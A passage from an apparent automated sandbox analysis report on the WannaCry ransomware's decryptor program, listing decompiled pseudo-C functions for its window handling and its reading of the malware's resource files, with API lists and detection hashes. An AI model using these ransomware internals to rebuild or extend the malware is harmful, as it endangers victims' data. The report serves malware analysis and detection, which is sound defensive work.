                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                  • String ID:
                                  • API String ID: 2613176527-0
                                  • Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                  • Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
                                  • Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                  • Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407F80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E00407F80(void* __ecx) {
				struct _IO_FILE* _t24;
				void* _t30;
				void* _t37;
				void* _t38;
				signed int _t45;
				signed int _t48;
				signed int _t51;
				unsigned int _t53;
				signed int _t54;
				void* _t66;
				struct _IO_FILE* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;

				_t79 = __ecx;
				 *((char*)(_t81 + 0xc)) = 0;
				memset(_t81 + 0xd, 0, 0xc << 2);
				_t82 = _t81 + 0xc;
				asm("stosb");
				 *((intOrPtr*)(_t82 + 0x40)) = 0;
				memset(_t82 + 0x44, 0, 0x21 << 2);
				_t24 = fopen("00000000.res", "rb");
				_t76 = _t24;
				_t84 = _t82 + 0x14;
				_t89 = _t76;
				if(_t76 != 0) {
					fread(_t84 + 0x48, 0x88, 1, _t76);
					fclose(_t76);
					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
					_t45 = _t84 + 0x60;
					_push(_t84 + 0x2c);
					_t66 = _t79 + 0x5f0;
					_push("+++");
					_push(_t45);
					_push(_t66);
					_t30 = E0040C4F0(_t38, _t45, _t89);
					_t85 = _t84 + 0x30;
					_t77 = _t30;
					E0040C670();
					_t90 = _t77 - 0xffffffff;
					if(_t77 == 0xffffffff) {
						_push(_t85 + 0xc);
						_push("+++");
						_push(_t85 + 0x40);
						_push(_t66);
						_t37 = E0040C4F0(_t38, _t45, _t90);
						_t85 = _t85 + 0x10;
						_t77 = _t37;
					}
					_t24 = E0040C670();
					if(_t77 == 1) {
						_t24 = 0;
						asm("repne scasb");
						_t48 =  !(_t45 | 0xffffffff) - 1;
						if(_t48 >= 0x1e) {
							asm("repne scasb");
							_t51 =  !(_t48 | 0xffffffff) - 1;
							if(_t51 < 0x32) {
								asm("repne scasb");
								_t53 =  !(_t51 | 0xffffffff);
								_t78 = _t85 + 0xc - _t53;
								_t54 = _t53 >> 2;
								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
								return E00401A10(_t79 + 0x50c, 0);
							}
						}
					}
				}
				return _t24;
			}





















                                  0x00407f88
                                  0x00407f96
                                  0x00407f9b
                                  0x00407f9b
                                  0x00407f9d
                                  0x00407fa9
                                  0x00407fbb
                                  0x00407fbd
                                  0x00407fc3
                                  0x00407fc5
                                  0x00407fc8
                                  0x00407fca
                                  0x00407fdd
                                  0x00407fe4
                                  0x00407ffd
                                  0x00408006
                                  0x0040800a
                                  0x0040800b
                                  0x00408011
                                  0x00408016
                                  0x00408017
                                  0x00408018
                                  0x0040801d
                                  0x00408020
                                  0x00408022
                                  0x00408027
                                  0x0040802a
                                  0x00408034
                                  0x00408035
                                  0x0040803a
                                  0x0040803b
                                  0x0040803c
                                  0x00408041
                                  0x00408044
                                  0x00408044
                                  0x00408046
                                  0x0040804e
                                  0x00408057
                                  0x00408059
                                  0x0040805d
                                  0x00408061
                                  0x0040806a
                                  0x0040806e
                                  0x00408072
                                  0x0040807b
                                  0x0040807d
                                  0x00408089
                                  0x00408093
                                  0x004080a0
                                  0x00000000
                                  0x004080a7
                                  0x00408072
                                  0x00408061
                                  0x0040804e
                                  0x004080b3

                                  APIs
                                  • fopen.MSVCRT ref: 00407FBD
                                  • fread.MSVCRT ref: 00407FDD
                                  • fclose.MSVCRT ref: 00407FE4
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
                                    • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strncpy$fclosefopenfread
                                  • String ID: +++$00000000.res$s.wnry
                                  • API String ID: 3363958884-869915597
                                  • Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                  • Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
                                  • Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                  • Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401220 Relevance: 10.6, APIs: 7, Instructions: 53windowtimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401220(void* __ecx, long _a4) {
				long _t11;
				void* _t26;

				_t11 = _a4;
				_t26 = __ecx;
				if(_t11 != 0x3e9) {
					L8:
					L00412CBC();
					return _t11;
				}
				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
					KillTimer( *(_t26 + 0x20), 0x3e9);
					L00412B66();
				}
				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0);
				}
				_t11 =  *(_t26 + 0xa0);
				if(_t11 == 0) {
					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
					if(_t11 == 0xf) {
						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
					}
				}
				goto L8;
			}





                                  0x00401220
                                  0x0040122b
                                  0x0040122d
                                  0x004012c2
                                  0x004012c4
                                  0x004012cb
                                  0x004012cb
                                  0x00401241
                                  0x00401253
                                  0x0040125e
                                  0x00401266
                                  0x00401266
                                  0x00401283
                                  0x00401295
                                  0x00401295
                                  0x00401297
                                  0x0040129f
                                  0x004012b1
                                  0x004012b6
                                  0x004012b8
                                  0x004012b8
                                  0x004012b6
                                  0x00000000

                                  APIs
                                  • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
                                  • KillTimer.USER32(?,000003E9), ref: 0040125E
                                  • #4853.MFC42 ref: 00401266
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
                                  • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
                                  • #2379.MFC42 ref: 004012C4
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#2379#4853KillTimer
                                  • String ID:
                                  • API String ID: 178170520-0
                                  • Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                  • Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
                                  • Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                  • Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403860 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43windowthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00403860(void* __ecx) {
				int _t6;
				long _t7;
				void* _t9;
				void* _t14;

				_t14 = __ecx;
				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
				_push(0);
				if(_t6 != 0xffffffff) {
					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
					if(_t7 != 0) {
						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
						 *(_t14 + 0xf4) = _t9;
						return _t9;
					}
					return _t7;
				} else {
					_push(0);
					_push("Please select a host to decrypt.");
					L00412CC8();
					return _t6;
				}
			}







                                  0x00403861
                                  0x0040387a
                                  0x0040387f
                                  0x00403881
                                  0x0040389f
                                  0x004038a3
                                  0x004038b5
                                  0x004038c5
                                  0x004038cb
                                  0x00000000
                                  0x004038cb
                                  0x004038d3
                                  0x00403883
                                  0x00403883
                                  0x00403885
                                  0x0040388a
                                  0x00403891
                                  0x00403891

                                  APIs
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
                                  • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
                                  • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
                                  Strings
                                  • Please select a host to decrypt., xrefs: 00403885
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#1200CreateThread
                                  • String ID: Please select a host to decrypt.
                                  • API String ID: 3616405048-3459725315
                                  • Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                  • Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
                                  • Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                  • Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004044C0 Relevance: 10.5, APIs: 7, Instructions: 38windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 81%
                                  			E004044C0(void* __ecx, long _a4) {
				struct tagLOGFONTA _v72;
				long _t10;
				struct HFONT__* _t13;
				struct HWND__* _t15;
				void* _t21;

				_t10 = _a4;
				_t21 = __ecx;
				if(_t10 != 0) {
					L2:
					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
					_v72.lfUnderline = 1;
					_t13 = CreateFontIndirectA( &_v72);
					_push(_t13);
					L00412D5E();
					 *((char*)(_t21 + 0x58)) = 1;
					return _t13;
				}
				_t15 = GetParent( *(__ecx + 0x20));
				_push(_t15);
				L00412DAC();
				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
				_push(_t10);
				L00412DE2();
				if(_t10 != 0) {
					goto L2;
				}
				return _t10;
			}








                                  0x004044c0
                                  0x004044ca
                                  0x004044cc
                                  0x004044f8
                                  0x00404503
                                  0x0040450d
                                  0x00404513
                                  0x00404519
                                  0x0040451d
                                  0x00404522
                                  0x00000000
                                  0x00404522
                                  0x004044d2
                                  0x004044d8
                                  0x004044d9
                                  0x004044e8
                                  0x004044ee
                                  0x004044ef
                                  0x004044f6
                                  0x00000000
                                  0x00000000
                                  0x0040452a

                                  APIs
                                  • GetParent.USER32(?), ref: 004044D2
                                  • #2864.MFC42(00000000), ref: 004044D9
                                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                  • #2860.MFC42(00000000), ref: 004044EF
                                  • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                  • CreateFontIndirectA.GDI32(?), ref: 00404513
                                  • #1641.MFC42(00000000), ref: 0040451D
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
                                  • String ID:
                                  • API String ID: 2724197214-0
                                  • Opcode ID: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                  • Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
                                  • Opcode Fuzzy Hash: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                  • Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C060 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E0040C060(void* __ecx, void* __eflags) {
				void* _t35;
				int _t45;
				struct HWND__* _t56;
				signed int _t58;
				int _t59;
				intOrPtr* _t65;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t73;
				intOrPtr* _t75;
				struct HWND__* _t87;
				intOrPtr _t92;
				void* _t93;

				_push(0xffffffff);
				_push(E004142BB);
				 *[fs:0x0] = _t92;
				E00413060(0x2408, __ecx,  *[fs:0x0]);
				_push(_t58);
				E0040DBB0(_t92 + 0x18, 0x1000);
				 *(_t92 + 0x241c) = 0;
				_push(_t92 + 0x14);
				_t59 = _t58 | 0xffffffff;
				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
				_t93 = _t92 + 0x10;
				if(_t35 == 0) {
					_t87 =  *(_t93 + 0x2430);
					if(_t87 != 0) {
						SendMessageA(_t87, 0x4e20, 0, 0);
					}
					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
					_t65 =  *0x422210; // 0xb24228
					_push(0);
					_push(E0040DD40(_t93 + 0x1c));
					_push(E0040DD30(_t93 + 0x20));
					_push(7);
					if( *((intOrPtr*)( *_t65 + 0x18))() >= 0) {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0, 0);
						}
						_t69 =  *0x422210; // 0xb24228
						_push(_t93 + 0x10);
						_push(_t93 + 0x102c);
						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
						_push(_t93 + 0x17);
						if( *((intOrPtr*)( *_t69 + 0x1c))() >= 0) {
							if( *((char*)(_t93 + 0xf)) == 7) {
								_t59 = 0;
							}
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, _t59, 0);
							}
							_t70 =  *0x422210; // 0xb24228
							 *((intOrPtr*)( *_t70 + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							goto L21;
						} else {
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
							}
							_t73 =  *0x422210; // 0xb24228
							 *((intOrPtr*)( *_t73 + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
						}
					} else {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
						}
						_t75 =  *0x422210; // 0xb24228
						 *((intOrPtr*)( *_t75 + 0xc))();
						 *(_t93 + 0x241c) = 0xffffffff;
						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
					}
				} else {
					_t56 =  *(_t93 + 0x2430);
					if(_t56 != 0) {
						SendMessageA(_t56, 0x4e20, _t59, 0);
					}
					 *(_t93 + 0x241c) = _t59;
					L21:
					E0040DBF0(_t93 + 0x14);
					_t45 = _t59;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
				return _t45;
			}
















                                  0x0040c066
                                  0x0040c068
                                  0x0040c073
                                  0x0040c07a
                                  0x0040c07f
                                  0x0040c08b
                                  0x0040c0a2
                                  0x0040c0ad
                                  0x0040c0b2
                                  0x0040c0b5
                                  0x0040c0ba
                                  0x0040c0bf
                                  0x0040c0e7
                                  0x0040c0f6
                                  0x0040c102
                                  0x0040c102
                                  0x0040c111
                                  0x0040c116
                                  0x0040c11c
                                  0x0040c129
                                  0x0040c139
                                  0x0040c13a
                                  0x0040c142
                                  0x0040c17d
                                  0x0040c189
                                  0x0040c189
                                  0x0040c18b
                                  0x0040c195
                                  0x0040c19d
                                  0x0040c19e
                                  0x0040c1ac
                                  0x0040c1b2
                                  0x0040c1ed
                                  0x0040c1ef
                                  0x0040c1ef
                                  0x0040c1f3
                                  0x0040c1fe
                                  0x0040c1fe
                                  0x0040c200
                                  0x0040c208
                                  0x0040c20b
                                  0x00000000
                                  0x0040c1b4
                                  0x0040c1b6
                                  0x0040c1c2
                                  0x0040c1c2
                                  0x0040c1c4
                                  0x0040c1cc
                                  0x0040c1d3
                                  0x0040c1e3
                                  0x0040c1e3
                                  0x0040c144
                                  0x0040c146
                                  0x0040c152
                                  0x0040c152
                                  0x0040c154
                                  0x0040c15c
                                  0x0040c163
                                  0x0040c173
                                  0x0040c173
                                  0x0040c0c1
                                  0x0040c0c1
                                  0x0040c0ca
                                  0x0040c0d5
                                  0x0040c0d5
                                  0x0040c0db
                                  0x0040c216
                                  0x0040c21a
                                  0x0040c21f
                                  0x0040c21f
                                  0x0040c22b
                                  0x0040c238

                                  APIs
                                    • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
                                  • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
                                  • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
                                  • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
                                  • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#823
                                  • String ID:
                                  • API String ID: 3019263841-0
                                  • Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                  • Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
                                  • Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                  • Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409C20 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v0;
				char _v4;
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _t29;
				intOrPtr _t31;
				long _t36;
				intOrPtr _t38;
				intOrPtr* _t41;
				struct HWND__* _t47;
				intOrPtr _t48;
				long _t53;
				struct HWND__* _t58;
				signed int _t60;
				intOrPtr* _t67;
				signed int _t68;

				_t67 = __ecx;
				L00412FE6();
				_t68 = __eax;
				if((__eax & 0x00008000) != 0) {
					_push( &_v8);
					_push( &_v4);
					L00412FFE();
					if(_a4 == 0) {
						_t60 = _v0;
						_t41 = _v16;
					} else {
						_t58 =  *(__ecx + 0x20);
						_t36 = SendMessageA(_t58, 0x408, 0, 0);
						_t41 = _v16;
						_t53 = _t36;
						if(_t53 == _t41) {
							_t38 =  *((intOrPtr*)(_t67 + 0x68));
							_t58 =  *(_t67 + 0x6c);
							if(_t53 - _t38 < _t58) {
								_t53 = _t58 + _t38;
							}
						}
						asm("cdq");
						_t60 = (_v0 ^ _t58) - _t58 + _t53;
					}
					_t47 =  *(_t67 + 0x6c);
					_t29 = _t47 + _t41;
					if(_t60 <= _t29) {
						if(_t60 >= _t41) {
							InvalidateRect( *(_t67 + 0x20), 0, 1);
						}
					} else {
						_t60 = _t60 + _v12 - _t47 - _t41;
						if(_t60 > _t29) {
							_t60 = _t29;
						}
						_push(0);
						if((_t68 & 0x00004000) == 0) {
							_push(0x4000);
							_push(0);
							L00412DDC();
						} else {
							_push(0);
							_push(0x4000);
							L00412DDC();
						}
					}
					_t48 = _v12;
					_t31 = _t60 -  *(_t67 + 0x6c);
					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
					if(_t31 < _t48) {
						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
					}
					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
					return 1;
				} else {
					return 0;
				}
			}




















                                  0x00409c25
                                  0x00409c27
                                  0x00409c2c
                                  0x00409c34
                                  0x00409c4a
                                  0x00409c4b
                                  0x00409c4e
                                  0x00409c59
                                  0x00409c98
                                  0x00409c9c
                                  0x00409c5b
                                  0x00409c5b
                                  0x00409c68
                                  0x00409c6e
                                  0x00409c72
                                  0x00409c76
                                  0x00409c78
                                  0x00409c7b
                                  0x00409c84
                                  0x00409c86
                                  0x00409c86
                                  0x00409c84
                                  0x00409c8d
                                  0x00409c94
                                  0x00409c94
                                  0x00409ca0
                                  0x00409ca3
                                  0x00409ca8
                                  0x00409ce6
                                  0x00409cf0
                                  0x00409cf0
                                  0x00409caa
                                  0x00409cb2
                                  0x00409cb6
                                  0x00409cb8
                                  0x00409cb8
                                  0x00409cc0
                                  0x00409cc2
                                  0x00409cd4
                                  0x00409cd9
                                  0x00409cdd
                                  0x00409cc4
                                  0x00409cc4
                                  0x00409cc6
                                  0x00409ccd
                                  0x00409ccd
                                  0x00409cc2
                                  0x00409cf9
                                  0x00409cff
                                  0x00409d03
                                  0x00409d06
                                  0x00409d08
                                  0x00409d08
                                  0x00409d24
                                  0x00409d2f
                                  0x00409c37
                                  0x00409c3d
                                  0x00409c3d

                                  APIs
                                  • #3797.MFC42 ref: 00409C27
                                  • #6734.MFC42(?,?), ref: 00409C4E
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
                                  • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3797#4284#6734MessageSend
                                  • String ID:
                                  • API String ID: 1776784669-0
                                  • Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                  • Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
                                  • Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                  • Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004127E0 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v4;
				intOrPtr* _v16;
				intOrPtr _v24;
				void* __ebx;
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t33;
				signed int _t42;
				unsigned int _t44;
				signed int _t45;
				void* _t53;
				intOrPtr _t65;
				void* _t67;
				intOrPtr _t68;
				void* _t69;

				_push(0xffffffff);
				_push(E0041438B);
				_t21 =  *[fs:0x0];
				_push(_t21);
				 *[fs:0x0] = _t68;
				_push(__ecx);
				_push(0x244);
				L00412CEC();
				_t33 = _t21;
				_t69 = _t68 + 4;
				_v16 = _t33;
				_t53 = 0;
				_v4 = 0;
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					_t65 = _a16;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x138)) = 0;
					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
					if(_t65 != 0) {
						asm("repne scasb");
						_t42 =  !(__ecx | 0xffffffff);
						_push(_t42);
						L00412CEC();
						 *((intOrPtr*)(_t33 + 0x138)) = 0;
						asm("repne scasb");
						_t44 =  !(_t42 | 0xffffffff);
						_t67 = _t65 - _t44;
						_t45 = _t44 >> 2;
